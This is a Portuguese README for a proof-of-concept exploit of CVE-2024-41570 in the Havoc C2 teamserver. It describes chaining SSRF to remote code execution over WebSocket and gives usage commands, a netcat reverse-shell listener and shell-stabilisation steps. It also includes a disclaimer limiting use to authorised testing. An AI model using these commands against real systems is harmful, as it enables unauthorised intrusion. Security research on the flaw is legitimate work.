
Exploração automatizada de Reverse Shell via WebSocket | Havoc-C2-SSRF com RCE
Este projeto fornece um script de prova de conceito (PoC) baseado em Python para explorar um serviço vulnerável baseado em WebSocket. O script automatiza o registro de agentes, a entrega de payloads via WebSocket e a execução remota de comandos para estabelecer um reverse shell.
pip install -r requirements.txt
git clone https://github.com/kit4py/CVE-2024-41570.git
cd CVE-2024-41570
pip install -r requirements.txt
Execute o script com os argumentos necessários:
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
-t: URL de destino do servidor WebSocket.-i: Endereço IP do Team Server do Havoc.-p: Porta do Team Server do Havoc.-U: Nome de usuário para autenticação no WebSocket.-P: Senha para autenticação no WebSocket.-l: IP do listener para o reverse shell (sua máquina).-L: Porta do listener para o reverse shell (sua máquina).python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
nc -lvnp <listener_port>
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
stty rows 67 columns 318
O script requer as seguintes bibliotecas Python:
requestspycryptodomeInstale-as usando o comando:
pip install -r requirements.txt
Este script destina-se apenas a fins educacionais. Certifique-se de ter autorização explícita para testar o sistema de destino. O uso indevido deste script pode violar leis e diretrizes éticas.
Inspirado por Default Havoc Poc
Contribuições são bem-vindas! Sinta-se à vontade para fazer um fork do repositório e enviar um pull request.
Este projeto é licenciado sob a Licença MIT. Consulte o arquivo LICENSE para obter detalhes.